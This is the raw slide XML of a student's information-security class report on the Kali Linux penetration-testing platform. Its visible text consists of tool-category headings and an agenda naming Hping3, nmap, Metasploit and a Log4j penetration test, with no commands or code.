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9" r:id="rId3"/>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="331" r:id="rId5"/>
    <p:sldId id="351" r:id="rId6"/>
    <p:sldId id="308" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="310" r:id="rId9"/>
    <p:sldId id="312" r:id="rId10"/>
    <p:sldId id="311" r:id="rId11"/>
    <p:sldId id="296" r:id="rId12"/>
    <p:sldId id="297" r:id="rId13"/>
    <p:sldId id="298" r:id="rId14"/>
    <p:sldId id="299" r:id="rId15"/>
    <p:sldId id="305" r:id="rId16"/>
    <p:sldId id="300" r:id="rId17"/>
    <p:sldId id="301" r:id="rId18"/>
    <p:sldId id="302" r:id="rId19"/>
    <p:sldId id="303" r:id="rId20"/>
    <p:sldId id="258" r:id="rId21"/>
    <p:sldId id="304" r:id="rId22"/>
    <p:sldId id="306" r:id="rId23"/>
    <p:sldId id="307" r:id="rId24"/>
    <p:sldId id="268" r:id="rId25"/>
    <p:sldId id="275" r:id="rId26"/>
    <p:sldId id="332" r:id="rId27"/>
    <p:sldId id="333" r:id="rId28"/>
    <p:sldId id="334" r:id="rId29"/>
    <p:sldId id="335" r:id="rId30"/>
    <p:sldId id="336" r:id="rId31"/>
    <p:sldId id="337" r:id="rId32"/>
    <p:sldId id="338" r:id="rId33"/>
    <p:sldId id="273" r:id="rId34"/>
    <p:sldId id="276" r:id="rId35"/>
    <p:sldId id="277" r:id="rId36"/>
    <p:sldId id="278" r:id="rId37"/>
    <p:sldId id="279" r:id="rId38"/>
    <p:sldId id="280" r:id="rId39"/>
    <p:sldId id="274" r:id="rId40"/>
    <p:sldId id="339" r:id="rId41"/>
    <p:sldId id="295"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65" r:id="rId56"/>
    <p:sldId id="271" r:id="rId57"/>
    <p:sldId id="270" r:id="rId58"/>
    <p:sldId id="344" r:id="rId59"/>
    <p:sldId id="345" r:id="rId60"/>
    <p:sldId id="267" r:id="rId61"/>
    <p:sldId id="340" r:id="rId62"/>
    <p:sldId id="341" r:id="rId63"/>
    <p:sldId id="342" r:id="rId64"/>
    <p:sldId id="359" r:id="rId65"/>
    <p:sldId id="347" r:id="rId66"/>
    <p:sldId id="360" r:id="rId67"/>
    <p:sldId id="316" r:id="rId68"/>
    <p:sldId id="317" r:id="rId69"/>
    <p:sldId id="348" r:id="rId70"/>
    <p:sldId id="349" r:id="rId71"/>
    <p:sldId id="358" r:id="rId72"/>
    <p:sldId id="321" r:id="rId73"/>
    <p:sldId id="320" r:id="rId74"/>
    <p:sldId id="350" r:id="rId75"/>
    <p:sldId id="319" r:id="rId76"/>
    <p:sldId id="327" r:id="rId77"/>
    <p:sldId id="323" r:id="rId78"/>
    <p:sldId id="324" r:id="rId79"/>
    <p:sldId id="352" r:id="rId80"/>
    <p:sldId id="322" r:id="rId81"/>
    <p:sldId id="353" r:id="rId82"/>
    <p:sldId id="354" r:id="rId83"/>
    <p:sldId id="355" r:id="rId84"/>
    <p:sldId id="356" r:id="rId85"/>
    <p:sldId id="357" r:id="rId86"/>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5" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="115" d="100"/>
          <a:sy n="115" d="100"/>
        </p:scale>
        <p:origin x="14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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812805" y="6272785"/>
            <a:ext cx="4745736" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>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3806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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19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3192305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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19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4245778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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19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2749536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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>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lang="zh-TW" altLang="en-US"/>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920076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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19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3681965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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19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983823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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" alt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zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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237117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EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19</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2400389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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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598870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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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2029872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69EB0EA6-9142-40FA-8E54-DB396D815AD4}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>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zh-TW" altLang="en-US"/>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BAE0A0BE-BEA9-4933-9E43-95C36FFD66B5}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26949152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200"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mirrors.huaweicloud.com/java/jdk/8u202-b08/" TargetMode="External"/><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8669" y="1432223"/>
            <a:ext cx="9469235" cy="3035808"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>滲透測試平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>學生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>董宸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>維</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>老師</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>恩師龍大大</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458552" y="210453"/>
            <a:ext cx="2249334" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>11201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>資訊安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>平時報告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4187781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362878" y="257061"/>
            <a:ext cx="8086940" cy="898410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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dirty="0" smtClean="0"/>
              <a:t>01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資訊收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Information Gathering)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450527" y="1254616"/>
            <a:ext cx="6257228" cy="4946679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450527" y="5777346"/>
            <a:ext cx="2003455" cy="4239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07743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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>02.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|Vulnerability analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163782" y="1197049"/>
            <a:ext cx="6486192" cy="5203751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2475263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6" y="355229"/>
            <a:ext cx="8627779" cy="847067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>03.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>網站應用程式分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>|web application analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238597" y="1409925"/>
            <a:ext cx="6150260" cy="4957624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3536786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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>04.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資料庫評估</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>| Database assessment</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504605" y="1455123"/>
            <a:ext cx="5717788" cy="4891644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3978225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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>05.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>密碼攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>| Password Attack</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263535" y="1233617"/>
            <a:ext cx="5868807" cy="5167183"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="868286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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>06.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>無線網</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>| wireless Attack</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413164" y="1331237"/>
            <a:ext cx="5744111" cy="5119439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3498183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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>07.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>逆向工程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reverse engineering</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455172" y="1612669"/>
            <a:ext cx="5971496" cy="4854633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3122810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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>08.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻擊工具 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>EXPLOITATION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tOOLS</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039090" y="1269187"/>
            <a:ext cx="6458989" cy="5260497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2677239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8973588" cy="847067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>09.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>竊聽與欺瞞攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|sniffing &amp; spoofing</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122218" y="1143721"/>
            <a:ext cx="6242858" cy="5434035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41983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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>10.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>後期攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|post-exploitation</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496291" y="1427199"/>
            <a:ext cx="5377701" cy="4927881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349159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1851" y="274319"/>
            <a:ext cx="7772400" cy="797191"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536170" y="1223634"/>
            <a:ext cx="7772400" cy="4050792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>inux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>滲透測試主題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Hping3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3:Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1821885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2222" y="133003"/>
            <a:ext cx="7772400" cy="1079823"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>11.</a:t>
